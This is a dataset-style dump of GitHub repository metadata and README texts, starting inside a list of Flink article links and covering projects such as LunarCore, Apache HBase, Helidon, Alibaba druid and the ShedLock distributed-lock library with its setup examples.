-22、[一文搞懂Flink内部的Exactly Once和At Least Once](https://t.zsxq.com/UVfqfae) - -23、[一文让你彻底了解大数据实时计算框架 Flink](https://t.zsxq.com/eM3ZRf2) - - -当然,除了更新 Flink 相关的东西外,我还会更新一些大数据相关的东西,因为我个人之前不是大数据开发,所以现在也要狂补些知识!总之,希望进来的童鞋们一起共同进步! 
- -1、[Java 核心知识点整理.pdf](https://t.zsxq.com/7I6Iyrf) - -2、[假如我是面试官,我会问你这些问题](https://t.zsxq.com/myJYZRF) - -3、[Kafka 系列文章和学习视频](https://t.zsxq.com/iUZnamE) - -4、[重新定义 Flink 第二期 pdf](https://t.zsxq.com/r7eIeyJ) - -5、[GitChat Flink 文章答疑记录](https://t.zsxq.com/ZjiYrVr) - -6、[Java 并发课程要掌握的知识点](https://t.zsxq.com/QZVJyz7) - -7、[Lightweight Asynchronous Snapshots for Distributed Dataflows](https://t.zsxq.com/VVN7YB2) - -8、[Apache Flink™- Stream and Batch Processing in a Single Engine](https://t.zsxq.com/VVN7YB2) - -9、[Flink状态管理与容错机制](https://t.zsxq.com/NjAQFi2) - -10、[Flink 流批一体的技术架构以及在阿里的实践](https://t.zsxq.com/MvfUvzN) - -11、[Flink Checkpoint-轻量级分布式快照](https://t.zsxq.com/QVFqjea) - -12、[Flink 流批一体的技术架构以及在阿里的实践](https://t.zsxq.com/MvfUvzN) - -13、[Stream Processing with Apache Flink pdf](https://t.zsxq.com/N37mUzB) - -14、[Flink 结合机器学习算法的监控平台实践](https://t.zsxq.com/m6EAaQ3) - -15、[《大数据重磅炸弹-实时计算Flink》预备篇——大数据实时计算介绍及其常用使用场景 pdf 和视频](https://t.zsxq.com/emMBaQN) - -16、[《大数据重磅炸弹-实时计算Flink》开篇词 pdf 和视频](https://t.zsxq.com/fqfuVRR) - -17、[四本 Flink 书](https://t.zsxq.com/rVBQFI6) - -18、[流处理系统 的相关 paper](https://t.zsxq.com/rVBQFI6) - -19、[Apache Flink 1.9 特性解读](https://t.zsxq.com/FyzvRne) - -20、[打造基于Flink Table API的机器学习生态](https://t.zsxq.com/FyzvRne) - -21、[基于Flink on Kubernetes的大数据平台](https://t.zsxq.com/FyzvRne) - -22、[基于Apache Flink的高性能机器学习算法库](https://t.zsxq.com/FyzvRne) - -23、[Apache Flink在快手的应用与实践](https://t.zsxq.com/FyzvRne) - -24、[Apache Flink-1.9与Hive的兼容性](https://t.zsxq.com/FyzvRne) - -25、[打造基于Flink Table API的机器学习生态](https://t.zsxq.com/FyzvRne) - -26、[流处理系统的相关 paper](https://t.zsxq.com/rVBQFI6)",0 -apache/cassandra,Mirror of Apache Cassandra,2009-05-21T02:10:09Z,,,0 -mvel/mvel,MVEL (MVFLEX Expression Language),2011-05-17T17:59:38Z,,"# MVEL -MVFLEX Expression Language (MVEL) is a hybrid dynamic/statically typed, embeddable Expression Language and runtime for the Java Platform. 
-
-## Documentation
-
-http://mvel.documentnode.com/
-
-## How to build
-
-```
-git clone https://github.com/mvel/mvel.git
-cd mvel
-mvn clean install
-```
-",0
-Melledy/LunarCore,A game server reimplementation for a certain turn-based anime game,2023-10-10T12:57:35Z,,"![LunarCore](https://socialify.git.ci/Melledy/LunarCore/image?description=1&descriptionEditable=A%20game%20server%20reimplementation%20for%20version%202.1.0%20of%20a%20certain%20turn-based%20anime%20game%20for%20educational%20purposes.%20&font=Inter&forks=1&issues=1&language=1&name=1&owner=1&pulls=1&stargazers=1&theme=Light)
-
- -
- -[EN](README.md) | [简中](docs/README_zh-CN.md) | [繁中](docs/README_zh-TW.md) | [JP](docs/README_ja-JP.md) | [RU](docs/README_ru-RU.md) | [FR](docs/README_fr-FR.md) | [KR](docs/README_ko-KR.md) | [VI](docs/README_vi-VI.md) - -**Attention:** For any extra support, questions, or discussions, check out our [Discord](https://discord.gg/cfPKJ6N5hw). - -### Notable features -- Basic game features: Logging in, team setup, inventory, basic scene/entity management -- Monster battles working -- Natural world monster/prop/NPC spawns -- Character techniques -- Crafting/Consumables working -- NPC shops handled -- Gacha system -- Mail system -- Friend system (Assists are not working yet) -- Forgotten hall -- Pure Fiction -- Simulated universe (Runs can be finished, but many features are missing) - -# Running the server and client - -### Prerequisites -* [Java 17 JDK](https://www.oracle.com/java/technologies/javase/jdk17-archive-downloads.html) - -### Recommended -* [MongoDB 4.0+](https://www.mongodb.com/try/download/community) - -### Compiling the server -1. Open your system terminal, and compile the server with `./gradlew jar` -2. Create a folder named `resources` in your server directory -3. Download the `Config`, `TextMap`, and `ExcelBin` folders from [https://github.com/Dimbreath/StarRailData](https://github.com/Dimbreath/StarRailData) and place them into your resources folder. -4. Delete the `/resources/Config/LevelOutput` folder. -5. Download the `Config` folder from [https://gitlab.com/Melledy/LunarCore-Configs](https://gitlab.com/Melledy/LunarCore-Configs) and place them into your resources folder. These are for world spawns and are very important for the server. -6. Run the server with `java -jar LunarCore.jar` from your system terminal. Lunar Core comes with a built-in internal MongoDB server for its database, so no Mongodb installation is required. However, it is highly recommended to install Mongodb anyway. - -### Connecting with the client (Fiddler method) -1. 
**Log in with the client to an official server and Hoyoverse account at least once to download game data.** -2. Install and have [Fiddler Classic](https://www.telerik.com/fiddler) running. -3. Set fiddler to decrypt https traffic. (Tools -> Options -> HTTPS -> Decrypt HTTPS traffic) Make sure `ignore server certificate errors` is checked as well. -4. Copy and paste the following code into the Fiddlerscript tab of Fiddler Classic: - -``` -import System; -import System.Windows.Forms; -import Fiddler; -import System.Text.RegularExpressions; - -class Handlers -{ - static function OnBeforeRequest(oS: Session) { - if (oS.host.EndsWith("".starrails.com"") || oS.host.EndsWith("".hoyoverse.com"") || oS.host.EndsWith("".mihoyo.com"") || oS.host.EndsWith("".bhsr.com"")) { - oS.host = ""localhost""; // This can also be replaced with another IP address. - } - } -}; -``` - -5. If `autoCreateAccount` is set to true in the config, then you can skip this step. Otherwise, type `/account create [account name]` in the server console to create an account. -6. Login with your account name, the password field is ignored by the server and can be set to anything. - -### Server commands -Server commands can be run in the server console or in-game. There is a dummy user named ""Server"" in every player's friends list that you can message to use in-game commands. - -``` -/account {create | delete} [username] (reserved player uid). Creates or deletes an account. -/avatar lv(level) p(ascension) r(eidolon) s(skill levels). Sets the current avatar's properties. -/clear {relics | lightcones | materials | items}. Removes filtered items from the player inventory. -/gender {male | female}. Sets the player's gender. -/give [item id] x[amount] lv[number]. Gives the targetted player an item. -/giveall {materials | avatars | lightcones | relics}. Gives the targeted player items. -/heal. Heals your avatars. -/help. Displays a list of available commands. -/kick @[player id]. Kicks a player from the server. 
-/mail [content]. Sends the targeted player a system mail.
-/permission {add | remove | clear} [permission]. Gives/removes a permission from the targeted player.
-/refill. Refills your skill points in the open world.
-/reload. Reloads the server config.
-/scene [scene id] [floor id]. Teleports the player to the specified scene.
-/spawn [monster/prop id] x[amount] s[stage id]. Spawns a monster or prop near the targeted player.
-/stop. Stops the server.
-/unstuck @[player id]. Unstucks an offline player if they're in a scene that doesn't load.
-/worldlevel [world level]. Sets the targeted player's equilibrium level.
-```
-",0
-apache/hbase,Apache HBase,2014-05-23T07:00:07Z,,"
-
-![hbase-logo](https://raw.githubusercontent.com/apache/hbase/master/src/site/resources/images/hbase_logo_with_orca_large.png)
-
-[Apache HBase](https://hbase.apache.org) is an open-source, distributed, versioned, column-oriented store modeled after Google's [Bigtable](https://research.google.com/archive/bigtable.html): A Distributed Storage System for Structured Data by Chang et al. Just as Bigtable leverages the distributed data storage provided by the Google File System, HBase provides Bigtable-like capabilities on top of [Apache Hadoop](https://hadoop.apache.org/).
-
-# Getting Started
-To get started using HBase, the full documentation for this release can be found under the doc/ directory that accompanies this README. Using a browser, open the docs/index.html to view the project home page (or browse https://hbase.apache.org). The hbase '[book](https://hbase.apache.org/book.html)' has a 'quick start' section and is where you should begin your exploration of the hbase project.
-
-The latest HBase can be downloaded from the [download page](https://hbase.apache.org/downloads.html).
-
-We use mailing lists for announcements and discussion.
The mailing lists and archives are listed [here](http://hbase.apache.org/mail-lists.html).
-
-# How to Contribute
-The source code can be found at https://hbase.apache.org/source-repository.html
-
-The HBase issue tracker is at https://hbase.apache.org/issue-tracking.html
-
-Note that public registration for https://issues.apache.org/ has been disabled due to spam. If you want to contribute to HBase, please visit the [Request a jira account](https://selfserve.apache.org/jira-account.html) page to submit your request. Please make sure to select **hbase** as the '_ASF project you want to file a ticket_' so we can receive your request and process it.
-
-> **_NOTE:_** We need to process the requests manually, so it may take some time (for example, up to a week) for us to respond to your request.
-
-# About
-Apache HBase is made available under the [Apache License, version 2.0](https://hbase.apache.org/license.html)
-
-The HBase distribution includes cryptographic software. See the export control notice [here](https://hbase.apache.org/export_control.html).
-",0
-sirthias/pegdown,A pure-Java Markdown processor based on a parboiled PEG parser supporting a number of extensions,2010-04-30T11:44:16Z,,,0
-helidon-io/helidon,Java libraries for writing microservices,2018-08-27T11:03:52Z,,"

- -

-

- - - - - - - - - -

- -# Helidon: Java Libraries for Microservices - -Project Helidon is a set of Java Libraries for writing microservices. -Helidon supports two programming models: - -* Helidon MP: [MicroProfile 6.0](https://github.com/eclipse/microprofile/releases/tag/6.0) -* Helidon SE: a small, functional style API - -In either case your application is a Java SE program running on the -new Helidon Níma WebServer that has been written from the ground up to -use Java 21 Virtual Threads. With Helidon 4 you get the high throughput of a reactive server with the simplicity of thread-per-request style programming. - -The Helidon SE API in Helidon 4 has changed significantly from Helidon 3. The use of virtual threads has enabled these APIs to change from asynchronous to blocking. This results in much simpler code that is easier to write, maintain, debug and understand. Earlier Helidon SE code will require modification to run on these new APIs. For more information see the [Helidon SE Upgrade Guide](https://helidon.io/docs/v4/#/se/guides/upgrade_4x). - -Helidon 4 supports MicroProfile 6. This means your existing Helidon MP 3.x applications will run on Helidon 4 with only minor modifications. And since Helidon’s MicroProfile server is based on the new Níma WebServer you get all the benefits of running on virtual threads. For more information see the [Helidon MP Upgrade Guide](https://helidon.io/docs/v4/#/mp/guides/upgrade_4x). - -New to Helidon? Then jump in and [get started](https://helidon.io/docs/v4/#/about/prerequisites). - -Java 21 is required to use Helidon 4. - - -## License - -Helidon is available under Apache License 2.0. - -## Documentation - -Latest documentation and javadocs are available at . - -Helidon White Paper is available [here](https://www.oracle.com/a/ocom/docs/technical-brief--helidon-report.pdf). - -## Get Started - -See Getting Started at . - -## Downloads / Accessing Binaries - -There are no Helidon downloads. Just use our Maven releases (GroupID `io.helidon`). 
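The thread-per-request claim above rests entirely on Java 21 virtual threads: blocking code stays simple because parking a virtual thread is cheap. A Helidon-independent, plain-JDK sketch of that model (the "request handling" here is simulated with `Thread.sleep`; no Helidon APIs are involved):

```java
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.atomic.AtomicInteger;

// Plain-JDK sketch of the thread-per-request model: one cheap virtual thread
// per task, written in a straightforward blocking style (JDK 21+).
class VirtualThreadSketch {
    static int handleAll(int requests) {
        AtomicInteger handled = new AtomicInteger();
        // newVirtualThreadPerTaskExecutor starts a fresh virtual thread per task
        try (ExecutorService executor = Executors.newVirtualThreadPerTaskExecutor()) {
            for (int i = 0; i < requests; i++) {
                executor.submit(() -> {
                    try {
                        Thread.sleep(5); // a blocking call merely parks the virtual thread
                    } catch (InterruptedException e) {
                        Thread.currentThread().interrupt();
                    }
                    handled.incrementAndGet();
                });
            }
        } // ExecutorService.close() waits for all submitted tasks to finish
        return handled.get();
    }
}
```

With platform threads, dedicating a thread per request at high concurrency is expensive; with virtual threads the same blocking style scales, which is the trade-off Helidon 4 is built around.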
-See Getting Started at .
-
-## Helidon CLI
-
-macOS:
-```bash
-curl -O https://helidon.io/cli/latest/darwin/helidon
-chmod +x ./helidon
-sudo mv ./helidon /usr/local/bin/
-```
-
-Linux:
-```bash
-curl -O https://helidon.io/cli/latest/linux/helidon
-chmod +x ./helidon
-sudo mv ./helidon /usr/local/bin/
-```
-
-Windows:
-```bat
-PowerShell -Command Invoke-WebRequest -Uri ""https://helidon.io/cli/latest/windows/helidon.exe"" -OutFile ""C:\Windows\system32\helidon.exe""
-```
-
-See this [document](HELIDON-CLI.md) for more info.
-
-## Build
-
-You need JDK 21 to build Helidon 4.
-
-You also need Maven. We recommend 3.8.0 or newer.
-
-**Full build**
-```bash
-$ mvn install
-```
-
-**Checkstyle**
-```bash
-# cd to the component you want to check
-$ mvn validate -Pcheckstyle
-```
-
-**Copyright**
-
-```bash
-# cd to the component you want to check
-$ mvn validate -Pcopyright
-```
-
-**Spotbugs**
-
-```bash
-# cd to the component you want to check
-$ mvn verify -Pspotbugs
-```
-
-**Documentation**
-
-```bash
-# At the root of the project
-$ mvn site
-```
-
-**Build Scripts**
-
-Build scripts are located in `etc/scripts`. These are primarily used by our pipeline,
-but a couple are handy to use on your desktop to verify your changes.
- -* `copyright.sh`: Run a full copyright check -* `checkstyle.sh`: Run a full style check - -## Get Help - -* See the [Helidon FAQ](https://github.com/oracle/helidon/wiki/FAQ) -* Ask questions on Stack Overflow using the [helidon tag](https://stackoverflow.com/tags/helidon) -* Join us on Slack: [#helidon-users](http://slack.helidon.io) - -## Get Involved - -* Learn how to [contribute](CONTRIBUTING.md) -* See [issues](https://github.com/oracle/helidon/issues) for issues you can help with - -## Stay Informed - -* Twitter: [@helidon_project](https://twitter.com/helidon_project) -* Blog: [Helidon on Medium](https://medium.com/helidon) -",0 -alibaba/druid,阿里云计算平台DataWorks(https://help.aliyun.com/document_detail/137663.html) 团队出品,为监控而生的数据库连接池,2011-11-03T05:12:51Z,,"# druid - -[![Java CI](https://img.shields.io/github/actions/workflow/status/alibaba/druid/ci.yaml?branch=master&logo=github&logoColor=white)](https://github.com/alibaba/druid/actions/workflows/ci.yaml) -[![Codecov](https://img.shields.io/codecov/c/github/alibaba/druid/master?logo=codecov&logoColor=white)](https://codecov.io/gh/alibaba/druid/branch/master) -[![Maven Central](https://img.shields.io/maven-central/v/com.alibaba/druid?logo=apache-maven&logoColor=white)](https://search.maven.org/artifact/com.alibaba/druid) -[![Last SNAPSHOT](https://img.shields.io/nexus/snapshots/https/oss.sonatype.org/com.alibaba/druid?label=latest%20snapshot)](https://oss.sonatype.org/content/repositories/snapshots/com/alibaba/druid/) -[![GitHub release](https://img.shields.io/github/release/alibaba/druid)](https://github.com/alibaba/druid/releases) -[![License](https://img.shields.io/github/license/alibaba/druid?color=4D7A97&logo=apache)](https://www.apache.org/licenses/LICENSE-2.0.html) - -Introduction ---- - -- git clone https://github.com/alibaba/druid.git -- cd druid && mvn install -- have fun. 
-
-# 相关阿里云产品
-* [DataWorks数据集成](https://help.aliyun.com/document_detail/137663.html) ![DataWorks](https://github.com/alibaba/druid/raw/master/doc/dataworks_datax.png)
-
-Documentation
----
-
-- 中文 https://github.com/alibaba/druid/wiki/%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98
-- English https://github.com/alibaba/druid/wiki/FAQ
-- Druid Spring Boot Starter https://github.com/alibaba/druid/tree/master/druid-spring-boot-starter
-",0
-lukas-krecan/ShedLock,Distributed lock for your scheduled tasks,2016-12-11T13:53:59Z,,"ShedLock
-========
-[![Apache License 2](https://img.shields.io/badge/license-ASF2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0.txt) [![Build Status](https://github.com/lukas-krecan/ShedLock/workflows/CI/badge.svg)](https://github.com/lukas-krecan/ShedLock/actions) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent)
-
-ShedLock makes sure that your scheduled tasks are executed at most once at the same time.
-If a task is being executed on one node, it acquires a lock which prevents execution of the same task from another node (or thread).
-Please note that **if one task is already being executed on one node, execution on other nodes does not wait, it is simply skipped**.
-
-ShedLock uses an external store like Mongo, JDBC database, Redis, Hazelcast, ZooKeeper or others for coordination.
-
-Feedback and pull-requests welcome!
-
-#### ShedLock is not a distributed scheduler
-Please note that ShedLock is not and will never be a full-fledged scheduler, it's just a lock. If you need a distributed
-scheduler, please use another project ([db-scheduler](https://github.com/kagkarlsson/db-scheduler), [JobRunr](https://www.jobrunr.io/en/)).
-ShedLock is designed to be used in situations where you have scheduled tasks that are not ready to be executed in parallel, but can be safely
-executed repeatedly.
Moreover, the locks are time-based and ShedLock assumes that clocks on the nodes are synchronized. - -+ [Versions](#versions) -+ [Components](#components) -+ [Usage](#usage) -+ [Lock Providers](#configure-lockprovider) - - [JdbcTemplate](#jdbctemplate) - - [R2DBC](#r2dbc) - - [jOOQ](#jooq-lock-provider) - - [Micronaut Data Jdbc](#micronaut-data-jdbc) - - [Mongo](#mongo) - - [DynamoDB](#dynamodb) - - [DynamoDB 2](#dynamodb-2) - - [ZooKeeper (using Curator)](#zookeeper-using-curator) - - [Redis (using Spring RedisConnectionFactory)](#redis-using-spring-redisconnectionfactory) - - [Redis (using Spring ReactiveRedisConnectionFactory)](#redis-using-spring-reactiveredisconnectionfactory) - - [Redis (using Jedis)](#redis-using-jedis) - - [Hazelcast](#hazelcast) - - [Couchbase](#couchbase) - - [ElasticSearch](#elasticsearch) - - [OpenSearch](#opensearch) - - [CosmosDB](#cosmosdb) - - [Cassandra](#cassandra) - - [Consul](#consul) - - [ArangoDB](#arangodb) - - [Neo4j](#neo4j) - - [Etcd](#etcd) - - [Apache Ignite](#apache-ignite) - - [In-Memory](#in-memory) - - [Memcached](#memcached-using-spymemcached) - - [Datastore](#datastore) -+ [Multi-tenancy](#multi-tenancy) -+ [Customization](#customization) -+ [Duration specification](#duration-specification) -+ [Extending the lock](#extending-the-lock) -+ [Micronaut integration](#micronaut-integration) -+ [CDI integration](#cdi-integration) -+ [Locking without a framework](#locking-without-a-framework) -+ [Troubleshooting](#troubleshooting) -+ [Modes of Spring integration](#modes-of-spring-integration) - - [Scheduled method proxy](#scheduled-method-proxy) - - [TaskScheduler proxy](#taskscheduler-proxy) -+ [Release notes](#release-notes) - -## Versions -If you are using JDK >17 and up-to-date libraries like Spring 6, use version **5.1.0** ([Release Notes](#500-2022-12-10)). If you -are on older JDK or library, use version **4.44.0** ([documentation](https://github.com/lukas-krecan/ShedLock/tree/version4)). 
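The intro stresses that a node which fails to take the lock skips the execution rather than queuing behind it. That "acquire or skip" shape can be sketched with a plain-JDK non-blocking acquire (an illustration only, not ShedLock's `LockProvider` SPI; a real deployment coordinates through an external store, not an in-process semaphore):

```java
import java.util.concurrent.Semaphore;

// Illustration only: "at most once at the same time" via a non-blocking acquire.
// A caller that fails to get the permit skips the task instead of waiting.
class SkipIfLocked {
    private final Semaphore permit = new Semaphore(1);

    /** Runs the task only if nobody else holds the permit; returns whether it ran. */
    boolean runIfFree(Runnable task) {
        if (!permit.tryAcquire()) {
            return false; // lock held elsewhere: skip, do not queue
        }
        try {
            task.run();
            return true;
        } finally {
            permit.release();
        }
    }
}
```

The key design point mirrored here is `tryAcquire()` instead of a blocking `acquire()`: overlapping schedules degrade to skipped runs, never to a backlog of waiting executions.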
- -## Components -Shedlock consists of three parts -* Core - The locking mechanism -* Integration - integration with your application, using Spring AOP, Micronaut AOP or manual code -* Lock provider - provides the lock using an external process like SQL database, Mongo, Redis and others - -## Usage -To use ShedLock, you do the following -1) Enable and configure Scheduled locking -2) Annotate your scheduled tasks -3) Configure a Lock Provider - - -### Enable and configure Scheduled locking (Spring) -First of all, we have to import the project - -```xml - - net.javacrumbs.shedlock - shedlock-spring - 5.13.0 - -``` - -Now we need to integrate the library with Spring. In order to enable schedule locking use `@EnableSchedulerLock` annotation - -```java -@Configuration -@EnableScheduling -@EnableSchedulerLock(defaultLockAtMostFor = ""10m"") -class MySpringConfiguration { - ... -} -``` - -### Annotate your scheduled tasks - -```java -import net.javacrumbs.shedlock.spring.annotation.SchedulerLock; - -... - -@Scheduled(...) -@SchedulerLock(name = ""scheduledTaskName"") -public void scheduledTask() { - // To assert that the lock is held (prevents misconfiguration errors) - LockAssert.assertLocked(); - // do something -} -``` - -The `@SchedulerLock` annotation has several purposes. First of all, only annotated methods are locked, the library ignores -all other scheduled tasks. You also have to specify the name for the lock. Only one task with the same name can be executed -at the same time. - -You can also set `lockAtMostFor` attribute which specifies how long the lock should be kept in case the -executing node dies. 
This is just a fallback; under normal circumstances the lock is released as soon as the task finishes
-(unless `lockAtLeastFor` is specified, see below).
-**You have to set `lockAtMostFor` to a value which is much longer than normal execution time.** If the task takes longer than
-`lockAtMostFor`, the resulting behavior may be unpredictable (more than one process will effectively hold the lock).
-
-If you do not specify `lockAtMostFor` in `@SchedulerLock`, the default value from `@EnableSchedulerLock` will be used.
-
-Lastly, you can set the `lockAtLeastFor` attribute, which specifies the minimum amount of time for which the lock should be kept.
-Its main purpose is to prevent execution from multiple nodes in case of really short tasks and clock differences between the nodes.
-
-All the annotations support Spring Expression Language (SpEL).
-
-#### Example
-Let's say you have a task which you execute every 15 minutes and which usually takes a few minutes to run.
-Moreover, you want to execute it at most once per 15 minutes. In that case, you can configure it like this:
-
-```java
-import net.javacrumbs.shedlock.core.SchedulerLock;
-
-
-@Scheduled(cron = ""0 */15 * * * *"")
-@SchedulerLock(name = ""scheduledTaskName"", lockAtMostFor = ""14m"", lockAtLeastFor = ""14m"")
-public void scheduledTask() {
-    // do something
-}
-
-```
-By setting `lockAtMostFor` we make sure that the lock is released even if the node dies. By setting `lockAtLeastFor`
-we make sure it's not executed more than once in fifteen minutes.
-Please note that **`lockAtMostFor` is just a safety net in case the node executing the task dies, so set it to
-a time that is significantly larger than the maximum estimated execution time.** If the task takes longer than `lockAtMostFor`,
-it may be executed again and the results will be unpredictable (more processes will hold the lock).
-
-### Configure LockProvider
-There are several implementations of LockProvider.
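Before picking a provider, it may help to see the time-based semantics in one place. The sketch below is plain JDK and is not ShedLock's real `LockProvider` (which works against an external store shared by all nodes); it only illustrates how `lockAtMostFor` doubles as an expiry, so a lock left behind by a dead node becomes acquirable again:

```java
import java.time.Duration;
import java.time.Instant;
import java.util.concurrent.ConcurrentHashMap;

// Illustration of ShedLock's time-based lock semantics (not the real SPI):
// a name is lockable when it has no entry or its lock_until lies in the past.
class TimeBasedLockSketch {
    private final ConcurrentHashMap<String, Instant> lockUntil = new ConcurrentHashMap<>();

    /** Try to acquire {@code name} until {@code now + lockAtMostFor}; true on success. */
    boolean tryLock(String name, Duration lockAtMostFor, Instant now) {
        boolean[] acquired = {false};
        // compute() is atomic per key, so two concurrent callers cannot both win
        lockUntil.compute(name, (key, until) -> {
            if (until == null || !until.isAfter(now)) {
                acquired[0] = true;
                return now.plus(lockAtMostFor); // lockAtMostFor acts as the expiry
            }
            return until; // still held: the caller must skip this run
        });
        return acquired[0];
    }

    /** Release early: move lock_until back to "now" (ignoring lockAtLeastFor). */
    void unlock(String name, Instant now) {
        lockUntil.put(name, now);
    }
}
```

This also shows why `lockAtMostFor` must exceed the worst-case run time: once the expiry passes, another node may acquire the same name even though the first task is still running.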
- -#### JdbcTemplate -First, create lock table (**please note that `name` has to be primary key**) - -```sql -# MySQL, MariaDB -CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL, - locked_at TIMESTAMP(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3), locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); - -# Postgres -CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP NOT NULL, - locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); - -# Oracle -CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL, - locked_at TIMESTAMP(3) NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); - -# MS SQL -CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until datetime2 NOT NULL, - locked_at datetime2 NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); - -# DB2 -CREATE TABLE shedlock(name VARCHAR(64) NOT NULL PRIMARY KEY, lock_until TIMESTAMP NOT NULL, - locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL); -``` - -Or use [this](micronaut/test/micronaut-jdbc/src/main/resources/db/liquibase-changelog.xml) liquibase change-set. - -Add dependency - -```xml - - net.javacrumbs.shedlock - shedlock-provider-jdbc-template - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.jdbctemplate.JdbcTemplateLockProvider; - -... -@Bean -public LockProvider lockProvider(DataSource dataSource) { - return new JdbcTemplateLockProvider( - JdbcTemplateLockProvider.Configuration.builder() - .withJdbcTemplate(new JdbcTemplate(dataSource)) - .usingDbTime() // Works on Postgres, MySQL, MariaDb, MS SQL, Oracle, DB2, HSQL and H2 - .build() - ); -} -``` -By specifying `usingDbTime()` the lock provider will use UTC time based on the DB server clock. -If you do not specify this option, clock from the app server will be used (the clocks on app servers may not be -synchronized thus leading to various locking issues). 
- -It's strongly recommended to use `usingDbTime()` option as it uses DB engine specific SQL that prevents INSERT conflicts. -See more details [here](https://stackoverflow.com/a/76774461/277042). - -For more fine-grained configuration use other options of the `Configuration` object - -```java -new JdbcTemplateLockProvider(builder() - .withTableName(""shdlck"") - .withColumnNames(new ColumnNames(""n"", ""lck_untl"", ""lckd_at"", ""lckd_by"")) - .withJdbcTemplate(new JdbcTemplate(getDatasource())) - .withLockedByValue(""my-value"") - .withDbUpperCase(true) - .build()) -``` - -If you need to specify a schema, you can set it in the table name using the usual dot notation -`new JdbcTemplateLockProvider(datasource, ""my_schema.shedlock"")` - -To use a database with case-sensitive table and column names, the `.withDbUpperCase(true)` flag can be used. -Default is `false` (lowercase). - - -#### Warning -**Do not manually delete lock row from the DB table.** ShedLock has an in-memory cache of existing lock rows -so the row will NOT be automatically recreated until application restart. If you need to, you can edit the row/document, risking only -that multiple locks will be held. - -#### R2DBC -If you are really brave, you can try experimental R2DBC support. Please keep in mind that the -capabilities of this lock provider are really limited and that the whole ecosystem around R2DBC -is in flux and may easily break. - -```xml - - net.javacrumbs.shedlock - shedlock-provider-r2dbc - 5.13.0 - -``` - -and use it. - -```java -@Override -protected LockProvider getLockProvider() { - return new R2dbcLockProvider(connectionFactory); -} -``` -I recommend using [R2DBC connection pool](https://github.com/r2dbc/r2dbc-pool). - -#### jOOQ lock provider -First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above. 
- -Add dependency - -```xml - - net.javacrumbs.shedlock - shedlock-provider-jooq - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.jooq; - -... -@Bean -public LockProvider getLockProvider(DSLContext dslContext) { - return new JooqLockProvider(dslContext); -} -``` - -jOOQ provider has a bit different transactional behavior. While the other JDBC lock providers -create new transaction (with REQUIRES_NEW), jOOQ [does not support setting it](https://github.com/jOOQ/jOOQ/issues/4836). -ShedLock tries to create a new transaction, but depending on your set-up, ShedLock DB operations may -end-up being part of the enclosing transaction. - -If you need to configure the table name, schema or column names, you can use jOOQ render mapping as -described [here](https://github.com/lukas-krecan/ShedLock/issues/1830#issuecomment-2015820509). - -#### Micronaut Data Jdbc -If you are using Micronaut data and you do not want to add dependency on Spring JDBC, you can use -Micronaut JDBC support. Just be aware that it has just a basic functionality when compared to -the JdbcTemplate provider. - -First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above. - -Add dependency - -```xml - - net.javacrumbs.shedlock - shedlock-provider-jdbc-micronaut - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.jdbc.micronaut.MicronautJdbcLockProvider; - -... -@Singleton -public LockProvider lockProvider(TransactionOperations transactionManager) { - return new MicronautJdbcLockProvider(transactionManager); -} -``` - -#### Mongo -Import the project - -```xml - - net.javacrumbs.shedlock - shedlock-provider-mongo - 5.13.0 - -``` - -Configure: - -```java -import net.javacrumbs.shedlock.provider.mongo.MongoLockProvider; - -... 
@Bean
public LockProvider lockProvider(MongoClient mongo) {
    return new MongoLockProvider(mongo.getDatabase(databaseName));
}
```

Please note that MongoDB integration requires Mongo >= 2.4 and mongo-java-driver >= 3.7.0


#### Reactive Mongo
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-mongo-reactivestreams</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.mongo.reactivestreams.ReactiveStreamsMongoLockProvider;

...

@Bean
public LockProvider lockProvider(MongoClient mongo) {
    return new ReactiveStreamsMongoLockProvider(mongo.getDatabase(databaseName));
}
```

Please note that MongoDB integration requires Mongo >= 4.x and mongodb-driver-reactivestreams 1.x


#### DynamoDB 2
Depends on AWS SDK v2.

Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-dynamodb2</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.dynamodb2.DynamoDBLockProvider;

...

@Bean
public LockProvider lockProvider(software.amazon.awssdk.services.dynamodb.DynamoDbClient dynamoDB) {
    return new DynamoDBLockProvider(dynamoDB, "Shedlock");
}
```

> Please note that the lock table must be created externally with `_id` as a partition key.
> `DynamoDBUtils#createLockTable` may be used for creating it programmatically.
> A table definition is available from `DynamoDBLockProvider`'s Javadoc.

#### ZooKeeper (using Curator)
Import
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-zookeeper-curator</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.zookeeper.curator.ZookeeperCuratorLockProvider;

...

@Bean
public LockProvider lockProvider(org.apache.curator.framework.CuratorFramework client) {
    return new ZookeeperCuratorLockProvider(client);
}
```
By default, nodes for locks will be created under `/shedlock` node.
